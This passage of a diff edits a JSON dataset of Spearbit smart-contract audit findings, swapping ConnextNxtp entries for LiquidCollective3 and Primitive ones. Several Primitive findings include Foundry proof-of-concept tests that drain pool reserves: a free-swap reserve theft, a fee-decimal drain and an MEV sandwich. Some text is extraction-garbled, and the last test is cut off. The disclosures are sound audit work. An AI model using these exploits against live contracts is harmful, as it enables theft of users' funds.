(uint32) index) File: Operators.2.sol 142: ,! 143: 144: 145: 146: 147: 148: 149: 150: 151: { } uint256 operatorIndex) internal view returns (uint32) File: OperatorsRegistry.1.sol 484: ,! 485: 486: 487: 488: 489: 490: 491: 492: 493: return 0; { } if (operatorIndex + 1 >= stoppedValidatorCounts.length) { } return stoppedValidatorCounts[operatorIndex + 1];", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Incorrect formula for the scaled amplification coefficient in NatSpec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the context above, the scaled amplification coefficient a is described by the formula An(n (cid:0) 1) where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be Ann(cid:0)1 and not An(n (cid:0) 1), otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong. For the special case of n = 2, those values are actually equal 22(cid:0)1 = 2 = 2 (cid:1) 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens are more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A", + "title": "Funds might be pulled from CoverageFundV1 even when there has been no slashing incident.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, we still pull funds from the coverage funds contract to get closer to the upper bound limit: // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds ,! if (vars.availableAmountToUpperBound > 0) { // we pull the funds from the coverage recipient vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound); // we do not update the rewards as coverage is not considered rewards // we do not update the available amount as there are no more pulling actions to perform afterwards } So it is possible the slashed coverage funds get used even when there has been no slashing to account for.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "RootManager.propagate does not operate in a fail-safe manner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connector of all six chains (Ar- bitrum, Gnosis, Multichain, Optimism, Polygon, ZKSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and hub connector. The problem is that if one of the function calls to the chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figure out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase.", + "title": "Update inline documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": " OracleManager.1.sol functions highlighted in Context are missing the @return natspec. IOracle.1.sol#L204's highlighted comment is outdated. setMember can now also be called by the member itself. Also, there is a typo: adminitrator -> administrator. File: IOracle.1.sol 204: 209: /// @dev Only callable by the adminitrator @audit typo and outdated function setMember(address _oracleMember, address _newAddress) external; modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); File: Oracle.1.sol 28: 29: 30: 31: 32: 33: ... 189: ,! } _; } function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) {", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Arborist once whitelisted cannot be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Arborist has the power to write over the Merkle root. In case Arborist starts misbehaving (compro- mised or security issue) then there is no way to remove this Arborist from the whitelist.", + "title": "Document/mark unused (would-be-stale) storage parameters after migration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The following storage parameters will be unused after the migration of the protocol to v1 CLValidatorCount CLValidatorTotalBalance LastOracleRoundId.sol OperatorsV1, this will be more than one slot (it occupies regions of storage) ReportVariants, the slot has been changed (that means right after migration ReportVariants will be an empty array by default): bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1); - bytes32 internal constant REPORTS_VARIANTS_SLOT = ,! + bytes32 internal constant REPORT_VARIANTS_SLOT ,! = bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1);", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "WatcherManager is not set correctly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The setWatcherManager function missed to actually update the watcherManager, instead it is just emitting an event mentioning that Watcher Manager is updated when it is not. This could become a problem once new modules are added/revised in WatcherManager contract and Watcher- Client wants to use this upgraded WatcherManager. WatcherClient will be forced to use the outdated Watcher- Manager contract code.", + "title": "pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "pullCoverageFunds makes sure that the amount sending to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of pullELFees pullExceedingEth pullEth 33 Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Check __GAPs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical it is more difficult to maintain the code. Note: set to a risk rating of medium because the probably of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high. LPToken.sol: uint256[49] private __GAP; // should probably be 50 OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50 uint256[49] private __GAP; // should probably be 48 StableSwap.sol: uint256[49] private __GAP; // should probably be 48 Merkle.sol: uint256[49] private __GAP; // should probably be 47 ProposedOwnable.sol: 27", + "title": "Protocol fees are double-counted as registry balance and pool reserve", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, the registry is credited a protocolFee. However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registrys user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw them. If users and LPs decide to withdraw all their balances, the registry cant withdraw their fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, ,! uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying _entire_ reserve including protocol fees ,! subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); 5 assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk LPToken.sol#L16, OwnerPausableUpgradeable.sol#L16, StableSwap.sol#L39, Merkle.sol#L37," + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Message can be delivered out of order", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Messages can be delivered out of order on the spoke. Anyone can call the permissionless prove- AndProcess to process the messages in any order they want. A malicious user can force the spoke to process messages in a way that is beneficial to them (e.g., front-run).", + "title": "LP fees are in WAD instead of token decimal units", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD per liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( feeGrowthAsset=pool.feeGrowthGlobalAsset, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity) and they have credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets) which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units and tokens with fewer than 18 decimals can be stolen from the protocol. 6 // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values. create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { } // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, \"token-credit\"); uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0) ) ); subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, \"tokens-owed\"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, ,! \"post-draw-balance-mismatch\"); 7 } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Extra checks in _verifySender() of GnosisBase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "According to the Gnosis bridge documentation the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor would be able to have access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they can send an arbitrary root to this mainnet/L1 hub connector which the con- nector would mark it as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this along with their access to mirrorConnector on chain to send a cross-chain processMessage to the Gnosis hub connector and after they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, \"!bridge\"); return GnosisAmb(_amb).messageSender() == _expected; } 28", + "title": "Swaps can be done for free and steal the reserve given large liquidity allocation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pools new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput as the reserves are unchanged. The swapper will be credited deltaOutput tokens. The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC): This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent computed - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). as 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesnt require any token settlement. 4. settlement is called and the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack 8 is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap ,! address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %y \\t %s\", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() ,! // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 ,! / virtualY. 9 // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) ,! // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) ,! // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); ,! instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log(\"attacker asset profit: %s\", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, \"attacker-post-draw-balance-mismatch\"); vm.stopPrank(); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "Absence of Minimum delayBlocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Owner can accidentally set delayBlocks as 0 (or a very small delay block) which will collapse the whole fraud protection mechanism. Since there is no check for minimum delay before setting a new delay value so even a low value will be accepted by setDelayBlocks function function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, \"!delayBlocks\"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; }", + "title": "Unsafe type-casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the contract weve encountered various unsafe type-castings. invariant Within the _swap function, the next invariant is a int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable then is dangerously typecasted to int128 and assigned to a int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in a int128, in case it wont fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. iteration.nextInvariant _getLatestInvariantAndVirtualPrice getNetBalance During account settlement, getNetBalance is called to compute the difference between the \"physical reserves\" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesnt have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here as a legitimate possible revert would cause less issues than an actual overflow. getNetBalance 11 Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. encodeJumpInstruction: cannot encode more than 255 instructions, instructions will be cut off and they might perform an action that will then be settled unfavorably. decodeClaim: fee0/fee1 can overflow decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and pool is initialized wrong decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow would pro- vide less liquidity decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially lead to unfavor- able swaps Other PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast, the function is not used internally. AssemblyLib.toAmount: The typecast works if power < 39, otherwise leads to wrong results without revert- ing. This function is not used yet but consider performing a safe typecast here.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value would be allowed, then the functions could allow invalid roots to be passed. Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify the roots are not 0. 29 function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if (provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; }", + "title": "Protocol fees are in WAD instead of token decimal units", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has less than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "_removeAssetId() should also clear custodied", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However custodied isn't always 0. Suppose cap & custodied have a value (!=0), then _setLiquidityCap() is called to set the cap to 0. The function doesn't reset the custodied value so it will stay at !=0.", + "title": "Invariant.getX computation is wrong", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The protocol makes use of a solstat library to compute the off-chain swap amounts. The solstats Invariant.getX function documentation states: Computes x in x = 1 - (( (y + k) / K ) + ). However, the y + k term should be y - k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. Derivation: y = K (cid:8) (cid:0)(cid:8)(cid:0)1(1 (cid:8)(cid:0)1(y (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x) (cid:27)p(cid:28) (cid:1) + k (cid:0) (cid:0) k )=K = (cid:8)(cid:0)1(1 x) (cid:27)p(cid:28) (cid:0) k)=K + (cid:27)p(cid:28) (cid:1) = 1 (cid:0) x (cid:0) (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x = 1", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Remove liquidity while paused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment shows Liquidity can always be removed, even when the pool is paused.. On the other hand function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... } StableSwap.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... }", + "title": "Liquidity can be (de-)allocated at a bad price", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The re- quired deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that, the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y). // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), 14 poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1. MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %y \\t %s\", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( \"victim used asset/quote for allocate: %s \\t %y \\t %s\", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3. MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors ,! amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( 